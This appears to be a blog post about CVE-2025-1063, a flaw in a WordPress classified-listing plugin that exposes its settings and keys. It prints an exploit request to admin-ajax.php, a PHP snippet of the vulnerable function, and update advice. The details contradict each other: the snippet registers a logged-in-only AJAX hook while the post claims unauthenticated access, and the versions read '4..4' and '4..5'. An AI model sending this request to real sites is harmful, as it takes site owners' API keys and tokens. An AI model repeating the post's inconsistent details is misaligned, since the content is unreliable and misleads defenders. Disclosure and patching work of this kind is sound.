CVE-2025-1063: Sensitive Information Exposure in Classified Listing - Classified ads & Business Directory Plugin for WordPress

Hello folks! Today, we are going to discuss a critical vulnerability found in a popular WordPress plugin called "Classified Listing - Classified ads & Business Directory Plugin." This vulnerability, assigned CVE-2025-1063, impacts all versions up to and including 4..4 of the plugin. Please note this post includes code snippets, original references, and exploit details, so let's get started!

Affected Plugin

The Classified Listing - Classified ads & Business Directory Plugin is widely used to create classified ads and business directory websites with WordPress. However, it suffers from a Sensitive Information Exposure vulnerability that can lead to the leakage of sensitive information, such as API keys and tokens.

Vulnerability Overview

CVE-2025-1063 affects the rtcl_taxonomy_settings_export function in the plugin, which does not perform proper permission checks and allows unauthenticated users to trigger a settings export, resulting in sensitive data exposure.

Here's a simple exploit for this vulnerability

GET /wp-admin/admin-ajax.php?action=rtcl_taxonomy_settings_export HTTP/1.1
Host: targetsite.com

By simply sending this request to a targeted site, an attacker can exploit the vulnerability and receive a JSON object containing sensitive data.

The following code snippet highlights the vulnerable function in the Classified Listing plugin

add_action( 'wp_ajax_rtcl_taxonomy_settings_export', 'rtcl_taxonomy_settings_export' );

function rtcl_taxonomy_settings_export() {
    $data = [
        'api_keys' => get_option( 'classified_listing_api_keys' ),
        // ...
    ];

    header( 'Content-Type: application/json; charset=utf-8' );
    echo json_encode( $data );
    exit;
}

As we can observe, the rtcl_taxonomy_settings_export() function exports sensitive data without performing any authentication or permission check, allowing unauthenticated users to access the information.

Mitigation

The best way to protect against this vulnerability is to update the Classified Listing plugin to version 4..5 or higher, as this issue has been addressed in newer versions. If an update is not possible, you can temporarily disable the plugin until a patch is available.

References

1. CVE-2025-1063 Vulnerability Information
2. Classified Listing Plugin Homepage
3. Classified Listing Plugin Changelog

If you are using the Classified Listing plugin, ensure that you take the necessary precautions to protect your website from this vulnerability. Stay safe, and always keep your plugins up-to-date!

Timeline

Published on: 02/25/2025 07:15:17 UTC
Last modified on: 02/28/2025 16:07:01 UTC